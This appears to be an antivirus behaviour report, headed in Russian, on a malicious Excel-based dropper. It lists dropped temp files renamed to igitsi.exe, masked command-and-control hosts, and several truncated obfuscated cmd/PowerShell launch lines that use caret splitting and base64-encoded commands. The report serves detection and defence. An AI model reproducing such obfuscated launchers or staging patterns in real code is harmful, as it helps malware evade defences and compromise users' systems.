Техническая информация
- '<SYSTEM32>\cmd.exe' /C Po^w^ERS^hE^ll -E WwBTAFkAUwBUAEUATQAuAFQARQB4AHQALgBlAG4AQwBPAEQAaQBOAEcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAGcARQB0AHMAVAByAGkATgBnACgAWwBzAFkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoAZgByAG8AbQBi...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{577c7ba6-45e5-4316-b7ad-9635d4b7ff2a}.tmp
- %TEMP%\bit499e.tmp
- %TEMP%\bit493f.tmp
- %TEMP%\bit49be.tmp
- %TEMP%\bit49de.tmp
- %TEMP%\bit499e.tmp
- %TEMP%\bit493f.tmp
- %TEMP%\bit49be.tmp
- %TEMP%\bit49de.tmp
- %TEMP%\bit49be.tmp в %TEMP%\igitsi.exe
- %TEMP%\bit49de.tmp в %TEMP%\igitsi.exe
- %TEMP%\bit493f.tmp в %TEMP%\igitsi.exe
- %TEMP%\bit499e.tmp в %TEMP%\igitsi.exe
- %TEMP%\igitsi.exe
- 'cd#.##scordapp.com':443
- 'ch####p.dyndns.org':80
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- DNS ASK ch####p.dyndns.org
- '%TEMP%\igitsi.exe'
- '<SYSTEM32>\cmd.exe' /C Po^w^ERS^hE^ll -E WwBTAFkAUwBUAEUATQAuAFQARQB4AHQALgBlAG4AQwBPAEQAaQBOAEcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAGcARQB0AHMAVAByAGkATgBnACgAWwBzAFkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoAZgByAG8AbQBi...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E WwBTAFkAUwBUAEUATQAuAFQARQB4AHQALgBlAG4AQwBPAEQAaQBOAEcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAGcARQB0AHMAVAByAGkATgBnACgAWwBzAFkAcwB0AEUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABzAH...
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding